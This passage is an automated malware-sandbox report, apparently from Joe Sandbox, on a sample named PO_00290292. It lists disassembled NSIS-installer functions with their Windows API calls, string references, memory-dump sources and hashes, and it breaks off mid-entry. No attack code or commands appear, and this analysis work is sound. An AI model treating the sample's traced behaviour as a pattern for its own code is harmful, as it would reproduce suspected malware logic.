                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                                  • Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
                                                                  • Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                                  • Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405C3A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0,00000000), ref: 00405BEB
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0,00000000), ref: 00405C93
                                                                  • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0), ref: 00405CA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: 4Wu.Wu$0_B
                                                                  • API String ID: 3248276644-297793725
                                                                  • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                  • Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
                                                                  • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                                  • Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040604B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Remove folder: ,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00406075
                                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00406096
                                                                  • RegCloseKey.KERNELBASE(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 004060B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Remove folder:
                                                                  • API String ID: 3677997916-1958208860
                                                                  • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                  • Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
                                                                  • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                  • Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                    • Part of subcall function 0040585E: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                    • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3585118688-0
                                                                  • Opcode ID: a93272ca9247789d0c80852616a40b8bf2a69f58e54105aa7b18d312abe2cf43
                                                                  • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
                                                                  • Opcode Fuzzy Hash: a93272ca9247789d0c80852616a40b8bf2a69f58e54105aa7b18d312abe2cf43
                                                                  • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004038D5 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
                                                                  • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
                                                                  • C:\Users\user\AppData\Local\Temp\nsp6601.tmp\, xrefs: 0040390B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsp6601.tmp\
                                                                  • API String ID: 2962429428-515242160
                                                                  • Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                                  • Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
                                                                  • Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                                  • Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004030E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID: x~
                                                                  • API String ID: 973152223-1841499174
                                                                  • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                  • Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
                                                                  • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                  • Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0,00000000), ref: 00405BEB
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                    • Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,?,00000000,000000F0), ref: 00401645
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement, xrefs: 00401638
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement
                                                                  • API String ID: 1892508949-4198271790
                                                                  • Opcode ID: 2305ffb504cd1727ef0d2f6d990949bd10217623809cec2c7a11ebe9bcb6ddd7
                                                                  • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
                                                                  • Opcode Fuzzy Hash: 2305ffb504cd1727ef0d2f6d990949bd10217623809cec2c7a11ebe9bcb6ddd7
                                                                  • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040585E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                  • CloseHandle.KERNEL32(?), ref: 00405894
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405871
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                  • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
                                                                  • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                  • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406C7B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                  • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
                                                                  • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                  • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406E7C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                  • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
                                                                  • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                  • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406B92 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                  • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
                                                                  • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
